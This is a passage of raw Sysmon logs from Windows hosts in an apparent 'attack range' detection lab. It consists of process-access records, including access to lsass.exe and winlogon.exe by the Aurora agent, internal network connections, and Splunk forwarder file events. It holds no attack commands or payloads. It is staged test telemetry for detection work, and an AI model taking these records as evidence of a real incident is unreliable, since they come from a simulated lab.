Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040283Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.872{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040282Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.870{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040281Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.866{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040280Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.856{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040279Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.851{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040278Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.845{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040277Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.843{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040276Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.841{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040275Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.839{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040274Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.813{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040273Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.806{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040272Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.801{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040271Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.789{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040270Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.783{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040269Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.775{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040268Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.768{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040267Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.757{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040266Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.748{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040265Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.736{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040264Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.725{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040263Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.684{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040262Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.679{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 354300x800000000000000040261Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:10.122{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56242-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000040260Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:10.122{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56242-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000040259Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:09.281{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56241-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000040258Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:09.281{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56241-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local389ldap 23542300x800000000000000040257Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.617{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94987FA991ED74DDDBF6F0CA03C5CDD3,SHA256=F34086B8A2A08DDEF5F7D31756386151688A6A0C35B863C4137D4A14B3913C7D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015421Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:11.572{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAF018494C46E5F5CEBE5CFDA347D13C,SHA256=A61EAC1C98A2FBF91499E1EBF970EC40DCE2FFE26BDA4B919DFB84B14C6CB471,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000040287Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:10.623{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56243-false10.0.1.12-8000- 23542300x800000000000000015423Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:12.663{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A050130D41A45630DB2B882B45E2D577,SHA256=788751A7C99F01A9510E9C54CD226AD8967F7B2C36DA9E7BCC005ACC3EB4B99A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000040286Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:12.221{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 354300x800000000000000015422Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:10.081{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50051-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000040289Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:13.750{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C624701E45F433AA24180D62F814AD3E,SHA256=DF3CAEA60F298992B9A8171A8EAFEF5D4DAEF1AEBA6F70DA474186A89C2BEE1A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015424Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:13.752{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0710C39AC75FEF28CF6BE525D78B542,SHA256=7498208AB5BC877D2C04D888CA93466AB7C2BAB16E2744FBD26F99416D43D60E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040288Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:13.047{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38D7A5B75D5B612C52F7CB981F64A984,SHA256=477D22C02F213E8D9CC97727F418244CCF64B71D2A46E3332B4512016F947CE5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015425Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:14.844{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=990FE4BB652F0B73A10B16A473E2965C,SHA256=3920B9E32E5DEA0A95C6CF2256AEFC8C81701F14E206766467108E1F73C0CE05,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000040315Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.857{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 